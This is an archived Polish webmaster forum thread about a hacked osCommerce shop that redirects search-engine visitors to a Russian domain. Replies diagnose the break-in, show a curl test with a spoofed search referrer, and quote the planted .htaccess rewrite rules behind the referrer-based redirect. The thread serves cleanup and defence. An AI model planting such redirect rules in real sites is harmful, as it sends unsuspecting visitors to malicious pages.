Skocz do zawartości

Bardzo dziwny wirus


Pozycjoner.pro

Rekomendowane odpowiedzi

Jeden z moich sklepów oparty na os commerce złapał wirusa.

Po wejściu na stronę z wyszukiwarki, jest automatycznie przekierowywany na stronę rosyjską.

Znalazłem w plikach php dziwny kod, skasowałem, ale problem nadal występuje.

Co ciekawe skasowałem plik index.php i htaccess, a to dziwne przekierowanie nadal przy wejściu z wyszukiwarki

występuje. Mam serwer w nazwa.pl.

Macie jakiś pomysł gdzie on może się ukrywać ?

Mam pisać do nazwy ?

Odnośnik do komentarza
Udostępnij na innych stronach

Podaj adres.

HTTP 200 usługi IT -> Dariusz Janicki | Realizacja serwisów www oraz oprogramowania w PHP / C# / Golang / Node.js / MySQL/ Laravel
Komory normobaryczne - normobaria.tech Wykonawca montażu i instalacji komory normobarii

Odnośnik do komentarza
Udostępnij na innych stronach

Sprawdź dokładnie zawartość pliku .htaccess.

Prawdopodobnie masz podmienioną zawartość pliku cookie_usage.php.

Szukaj w katalogu /images pliku .php , ten do skasowania.

Nie musi być dokładnie tak jak napisałem, wtedy musisz przejrzeć wszystkie pliki i katalogi.

Kiedy się tego pozbędziesz poszukaj w Google jak zabezpieczyć sklep. Dobrze by też było za pomocą .htaccess zablokować wejście do katalogu /admin innym IP niż używane przez ciebie.

Nie znam się na pozycjonowaniu, ja tu tylko zużywam transfer i miejsce w sql.

Roman Kluska ujawnia: nadchodzi INFLACYJNY ARMAGEDON!

 

Odnośnik do komentarza
Udostępnij na innych stronach

To nie tyle wirus, co włamanie poprzez dziurę w skrypcie. Dzięki tej dziurze można wgrać na serwer plik .php i dzięki niemu mieć dostęp do całego serwera np. https://img23.imageshack.us/img23/6879/zrzut1359.png

Wtedy można robić co się komu podoba.

Nie znam się na pozycjonowaniu, ja tu tylko zużywam transfer i miejsce w sql.

Roman Kluska ujawnia: nadchodzi INFLACYJNY ARMAGEDON!

 

Odnośnik do komentarza
Udostępnij na innych stronach

Jeśli pobierzemy index.php np CURL'em z domeny o jakiej amstrad pisze i ustawimy referrer na

curl_setopt($ch,CURLOPT_REFERER,'https://www.bing.com/search?q=site%3Aksprawdzanyadresit.pl&src=IE-SearchBox&FORM=IE8SRC');

ma ustawione na żywca 301

HTTP/1.1 301 Moved Permanently Date: Wed, 29 Dec 2010 21:07:07 GMT Content-Type: text/html; charset=iso-8859-1 Connection: keep-alive Location: https://juliforsti.ru/in.cgi?7 Content-Length: 237 Server: Apache/2

Moved Permanently

The document has moved here.

HTTP 200 usługi IT -> Dariusz Janicki | Realizacja serwisów www oraz oprogramowania w PHP / C# / Golang / Node.js / MySQL/ Laravel
Komory normobaryczne - normobaria.tech Wykonawca montażu i instalacji komory normobarii

Odnośnik do komentarza
Udostępnij na innych stronach

W .htaccess można znaleźć coś takiego

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
RewriteCond %{HTTP_REFERER} .*qq.* [OR]

...

RewriteRule ^(.*)$ https://juliforsti.ru/in.cgi?7 [R=301,L]

Nie znam się na pozycjonowaniu, ja tu tylko zużywam transfer i miejsce w sql.

Roman Kluska ujawnia: nadchodzi INFLACYJNY ARMAGEDON!

 

Odnośnik do komentarza
Udostępnij na innych stronach

Zarchiwizowany

Ten temat przebywa obecnie w archiwum. Dodawanie nowych odpowiedzi zostało zablokowane.

  • Ostatnio przeglądający   0 użytkowników

    • Brak zarejestrowanych użytkowników przeglądających tę stronę.
×
×
  • Dodaj nową pozycję...

Powiadomienie o plikach cookie

Umieściliśmy na Twoim urządzeniu pliki cookie, aby pomóc Ci usprawnić przeglądanie strony. Możesz dostosować ustawienia plików cookie, w przeciwnym wypadku zakładamy, że wyrażasz na to zgodę. Warunki użytkowania Polityka prywatności